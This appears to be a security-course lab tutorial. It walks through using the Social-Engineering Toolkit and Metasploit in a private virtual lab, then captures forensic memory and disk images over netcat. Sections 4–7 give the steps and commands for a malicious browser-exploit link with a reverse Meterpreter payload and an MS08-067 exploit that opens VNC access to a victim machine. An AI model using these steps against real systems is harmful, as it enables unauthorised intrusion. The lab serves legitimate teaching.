ComputerSecurityStudent (CSS)





(Social Engineering Toolkit (SET): Lesson 3)

{ Create Malicious Weblink, Install Virus, Capture Forensic Images }


Section 0. Background Information
  • What is the Social-Engineering Toolkit (SET)
    • The Social-Engineering Toolkit (SET) is a Python-driven suite of custom tools that focuses solely on attacking the human element of penetration testing.
    • Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.
    • SET is available on BackTrack 5, BackBox, Blackbuntu, GnackTrack, and other Linux distributions used for penetration testing.

     

  • Lab Notes
    • In this lab we will do the following:
      1. Use SET to Create a Malicious Web Link
      2. Create an additional VNC Session
      3. Install a Fake Virus
      4. Capture Forensic Memory and Hard Disk Images.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.

     

Section 1. Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Programs --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

 

Section 2. Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME Desktop
    • Instructions:
      1. Type startx

 

Section 3. Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

 

Section 4. Start the Social Engineering ToolKit
  1. Start Social Engineering ToolKit
    • Instructions:
      1. cd /pentest/exploits/set
      2. ./set

     

  2. Website Attack Vector
    • Instructions:
      1. Select 2

     

  3. Select Metasploit Browser Attack Method
    • Instructions:
      1. Select 2

     

  4. Select Web Templates
    • Instructions:
      1. Select 1

     

  5. Set Facebook Web Attack
    • Instructions:
      1. Select 4

     

  6. Enter Exploit
    • Instructions:
      1. 24) Metasploit Browser Autopwn (USE AT OWN RISK!)

     

  7. Set Payload
    • Instructions:
      1. Select 2) Windows Reverse_TCP Meterpreter
      2. Use Port 5555

     

  8. Exploits Prepared, Server Started
    • Instructions:
      1. You are looking for the "--- Done, Found" message before you continue.
      2. Continue to next Section.

     

Section 5. Start Up Windows Machine
  • Social Engineering Note
    • Imagine how an attacker could embed the malicious link, created in the previous Section, in an email to a possible victim.
    • This type of attack is especially dangerous because it crashes the victim's web browser, and the victim does not realize the Metasploit payload was injected and a session is now attached to a migrated notepad process.
  1. Booting up WindowsVulerable01
    • Instructions:
      1. Start up VMware Player
      2. Select WindowsVulerable01
      3. Edit Virtual Machine

     

  2. Configuring the Network Adapter
    • Instructions:
      1. Select Network Adapter
      2. Select Bridged Connection
      3. Select OK

     

  3. Play WindowVulnerable01
    • Instructions:
      1. Select Play virtual Machine

     

  4. WindowsVulerable01 Authentication
    • Instructions:
      1. Login as administrator

 

Section 6. Start Up a Web Browser
  1. Start Up Internet Explorer
    • Instructions:
      1. Start --> All Programs --> Internet Explorer

     

  2. Victim Clicks on Link
    • Instructions:
      1. Place the Malicious Web Link in the Address Bar.
        • In my case, http://192.168.1.105:8080
        • In your case, get the IP address from Section 4, Step 8.
    • Note:
      • The Web Browser will just crash.

 

Section 7. Entering the Victim's Machine
  1. Record Victim's IP Address
    • Instructions:
      1. Record the Victim's IP Address.
      2. Look for the line that starts with Session ID 1 (See Below).

     

  2. Create VNC Session to Victim's machine
    • Instructions:
      1. Press <Enter>
      2. use windows/smb/ms08_067_netapi
      3. set PAYLOAD windows/vncinject/bind_tcp
      4. set RHOST 192.168.1.109
        • Note: This is the IP Address obtained in the previous step.
      5. exploit

     

  3. Viewing the Victim's Machine over VNC
    • Instructions:
      1. Now you have a VNC connection to the Victim's Machine.
      2. Pretty KooL right!!!
    • Proof of Lab Instructions #1:
      1. Click in the Metasploit Courtesy Shell
      2. date, press enter twice
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • i.e., echo "John Gray"
      4. PrtScn
      5. Paste into a word document
      6. Continue to Next Step

     

  4. Bring Up Internet Explorer
    • Instructions:
      1. Start --> Internet Explorer

     

  5. Download Fake Virus.
    • Instructions:
      1. Place the following link into the address bar.
        • http://www.computersecuritystudent.com/UNIX/BACKTRACK/BACKTRACK5R1/lesson6/fake_virus.bat
      2. Press Enter
      3. Click Save
      4. Continue to Next Step

     

  6. Save the Fake Virus.
    • Instructions:
      1. Navigate to "C:\tools\Virus Jar"
        • Create this directory if it does not already exist.
      2. Click Save

     

  7. Run the Fake Virus.
    • Instructions:
      1. Click the Run Button

     

  8. Viewing Results
    • Instructions:
      1. You will now see some messages stating your system was compromised.
        • Note, this is just a batch script that prints messages to a screen.
        • This was just an example of what an attacker could do once they compromised the victim's machine.
      2. Click on the Black Box and Press Enter.

     

  9. Delete the fake_virus.bat file
    • Instructions:
      1. Start --> My Computer
      2. Navigate to "C:\tools\Virus Jar"
      3. Right Click on fake_virus.bat
      4. Click Delete
      5. Send to Recycle Bin? Yes

     

  10. Delete the fake_virus.bat file from the Recycle Bin
    • Instructions:
      1. Navigate to the Recycle Bin
      2. Right Click on fake_virus.bat
      3. Click Delete
      4. Are you sure want to delete 'fake_virus.bat'? Yes
    • Notes:
      • We are completely removing this file, so we have a deleted file to both analyze and recover with preceding forensic labs.

 

Section 8. Start Up NetCat Listener To Receive Physical Memory Dump From Helix
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes:
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

     

  3. Start Up Netcat on BackTrack
    • Instructions:
      1. mkdir -p /FORENSICS/images/1/
      2. cd /FORENSICS/images/1/
      3. nc -l -vvv -p 8888 > WV01_PM_fake_virus.dd
        • Netcat will listen for Helix to send the Memory Image.
        • Nothing will be sent until you complete the following section.
      4. Continue to Next Section

 

Section 9. Start Helix to Send Physical Memory to BackTrack
  1. Edit Virtual Machine Settings
    • Instructions:
      1. Virtual Machine --> Virtual Machine Settings...

     

  2. Configure Windows to load the Helix iso as a CD/DVD
    • Instructions
      1. Select CD/DVD (IDE)
      2. Select the Use ISO image file
      3. Browse to where you saved the Helix iso.
        • Note: In my case, I saved it in the following location:
        • H:\BOOT ISO\Helix2008R1.iso

     

  3. Helix Screen
    • Instructions
      1. Select Accept

     

  4. Live Acquisition
    • Instructions
      1. Click on the Camera Icon.
      2. Select "\\PhysicalMemory" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire

     

  5. Notice
    • Instructions
      1. Click Yes

     

  6. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will say "Copying Physical memory"
      3. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

 

Section 10. Verify Physical Memory Dump on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01_PM_fake_virus.dd

 

Section 11. Start Up NetCat Listener To Receive Hard Drive Image From Helix
  1. Start Up Netcat on BackTrack
    • Instructions:
      1. cd /FORENSICS/images/1/
      2. nc -l -vvv -p 8888 > WV01_HD_fake_virus.dd
        • Netcat will listen for Helix to send the Hard Drive Image.
        • Nothing will be sent until you complete the following section.
      3. Continue to Next Section

 

Section 12. Use Helix to Send Hard Disk Image to BackTrack
  1. Live Acquisition
    • Instructions:
      1. Click on the Camera Icon.
      2. Select "C:\ (Logical drive)" from the Source Dropdown Menu
      3. Select the NetCat Radio Button
      4. Destination IP: Provide BackTrack's IP Address.
        • Obtain BackTrack's IP in Section 8, Step 2.
        • In my case, it is 192.168.1.105.
        • In your case, it will be different.
      5. Port: 8888
        • This is the Listening NetCat Port on the BackTrack Server.
      6. Click Acquire

     

  2. Notice
    • Instructions
      1. Click Yes

     

  3. Helix Informational
    • Instructions
      1. You will see a black command prompt like below.
      2. Notice it will say "Copying \\.\C to CONOUT$..."
      3. This 8GB copy will take about 30 minutes.
      4. DO NOT CONTINUE TO THE NEXT SECTION UNTIL the black box disappears

 

Section 13. Verify Hard Drive Image on BackTrack
  1. Verify Image Byte Size
    • Instructions:
      1. ls -l WV01*
      2. date
      3. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • i.e., echo "John Gray"
    • Proof of Lab Instructions #2:
      1. PrtScn
      2. Paste into the previously created word document
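
Sections 10 and 13 check the images by byte size only, which cannot show whether an image was altered after it was received. The script below is an added example, not part of the original lab: it records the size and SHA-256 of each .dd image in a directory such as /FORENSICS/images/1/ and re-checks them later. The script name, function names and manifest file name are assumptions made for this example.

```bash
#!/usr/bin/env bash
# Added example: record, then later re-check, size and SHA-256 of acquired images.
# MANIFEST, record_images and verify_images are names chosen for this example.
MANIFEST="images.manifest"

# record_images DIR: write "<sha256> <bytes> <file>" for each *.dd image in DIR.
record_images() (
    cd "$1" || exit 1
    rm -f "$MANIFEST"
    for f in *.dd; do
        [ -f "$f" ] || continue
        # A zero-byte image means netcat received nothing; refuse to baseline it.
        [ -s "$f" ] || { echo "EMPTY: $f" >&2; rm -f "$MANIFEST"; exit 2; }
        echo "$(sha256sum "$f" | cut -d' ' -f1) $(wc -c < "$f" | tr -d ' ') $f" >> "$MANIFEST"
        chmod 0444 "$f"            # evidence files become read-only
    done
    [ -s "$MANIFEST" ] || { echo "no images found in $1" >&2; exit 3; }
    chmod 0444 "$MANIFEST"
)

# verify_images DIR: return 0 only if every recorded image is present and unchanged.
verify_images() {
    local dir="$1" hash size name rc=0
    [ -r "$dir/$MANIFEST" ] || { echo "no manifest in $dir" >&2; return 1; }
    while read -r hash size name; do
        if [ ! -f "$dir/$name" ]; then
            echo "MISSING: $name"; rc=1
        elif [ "$(wc -c < "$dir/$name" | tr -d ' ')" != "$size" ]; then
            echo "SIZE CHANGED: $name"; rc=1
        elif [ "$(sha256sum "$dir/$name" | cut -d' ' -f1)" != "$hash" ]; then
            echo "HASH CHANGED: $name"; rc=1
        else
            echo "OK: $name"
        fi
    done < "$dir/$MANIFEST"
    return "$rc"
}

# Command-line use, e.g.:  ./images.sh record /FORENSICS/images/1
#                          ./images.sh verify /FORENSICS/images/1
case "${1:-}" in
    record) record_images "$2" ;;
    verify) verify_images "$2" ;;
esac
```

The hashes are computed on the BackTrack side after the netcat transfer, so they baseline the received files; they do not prove that the stream matched what Helix read on the Windows machine.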

     

Section 14. Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. Proof of Lab Instructions #1 (See Section 7, Step 3)
      2. Proof of Lab Instructions #2 (See Section 13, Step 1)
      3. Submit to Moodle.

     


